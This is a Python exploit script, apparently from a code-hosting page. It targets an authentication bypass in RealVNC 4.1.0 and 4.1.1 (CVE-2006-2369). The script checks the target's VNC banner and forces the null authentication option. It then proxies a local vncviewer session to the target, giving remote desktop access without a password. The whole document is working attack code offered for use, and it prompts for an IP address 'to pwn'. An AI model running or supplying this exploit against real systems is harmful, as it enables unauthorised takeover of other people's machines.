95 lines
No EOL
2.6 KiB
Python
Executable file
95 lines
No EOL
2.6 KiB
Python
Executable file
# Exploit Title: RealVNC 4.1.0 and 4.1.1 Authentication Bypass Exploit
|
|
# Date: 2012-05-13
|
|
# Author: @fdiskyou
|
|
# e-mail: rui at deniable.org
|
|
# Version: 4.1.0 and 4.1.1
|
|
# Tested on: Windows XP
|
|
# CVE: CVE-2006-2369
|
|
# Requires vncviewer installed
|
|
# Basic port of hdmoore/msf2 perl version to python for fun and profit (ease of use)
|
|
import select
|
|
import thread
|
|
import os
|
|
import socket
|
|
import sys, re
|
|
|
|
BIND_ADDR = '127.0.0.1'
|
|
BIND_PORT = 4444
|
|
|
|
def pwn4ge(host, port):
|
|
socket.setdefaulttimeout(5)
|
|
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
|
try:
|
|
server.connect((host, port))
|
|
except socket.error, msg:
|
|
print '[*] Could not connect to the target VNC service. Error code: ' + str(msg[0]) + ' , Error message : ' + msg[1]
|
|
sys.exit();
|
|
else:
|
|
hello = server.recv(12)
|
|
print "[*] Hello From Server: " + hello
|
|
if hello != "RFB 003.008\n":
|
|
print "[*] The remote VNC service is not vulnerable"
|
|
sys.exit()
|
|
else:
|
|
print "[*] The remote VNC service is vulnerable"
|
|
listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
|
try:
|
|
listener.bind((BIND_ADDR, BIND_PORT))
|
|
except socket.error , msg:
|
|
print '[*] Bind failed. Error Code : ' + str(msg[0]) + ' Message ' + msg[1]
|
|
sys.exit()
|
|
print "[*] Listener Socket Bind Complete"
|
|
listener.listen(10)
|
|
print "[*] Launching local vncviewer"
|
|
thread.start_new_thread(os.system,('vncviewer ' + BIND_ADDR + '::' + str(BIND_PORT),))
|
|
print "[*] Listener waiting for VNC connections on localhost"
|
|
client, caddr = listener.accept()
|
|
listener.close()
|
|
client.send(hello)
|
|
chello = client.recv(12)
|
|
server.send(chello)
|
|
methods = server.recv(2)
|
|
print "[*] Auth Methods Recieved. Sending Null Authentication Option to Client"
|
|
client.send("\x01\x01")
|
|
client.recv(1)
|
|
server.send("\x01")
|
|
server.recv(4)
|
|
client.send("\x00\x00\x00\x00")
|
|
print "[*] Proxying data between the connections..."
|
|
running = True
|
|
while running:
|
|
selected = select.select([client, server], [], [])[0]
|
|
if client in selected:
|
|
buf = client.recv(8192)
|
|
if len(buf) == 0:
|
|
running = False
|
|
server.send(buf)
|
|
if server in selected and running:
|
|
buf = server.recv(8192)
|
|
if len(buf) == 0:
|
|
running = False
|
|
client.send(buf)
|
|
pass
|
|
client.close()
|
|
server.close()
|
|
sys.exit()
|
|
|
|
def printUsage():
|
|
print "[*] Read the source, Luke!"
|
|
|
|
def main():
|
|
try:
|
|
SERV_ADDR = sys.argv[1]
|
|
SERV_PORT = sys.argv[2]
|
|
except:
|
|
SERV_ADDR = raw_input("[*] Please input an IP address to pwn: ")
|
|
SERV_PORT = 5900
|
|
try:
|
|
socket.inet_aton(SERV_ADDR)
|
|
except socket.error:
|
|
printUsage()
|
|
else:
|
|
pwn4ge(SERV_ADDR, int(SERV_PORT))
|
|
|
|
if __name__ == "__main__":
|
|
main() |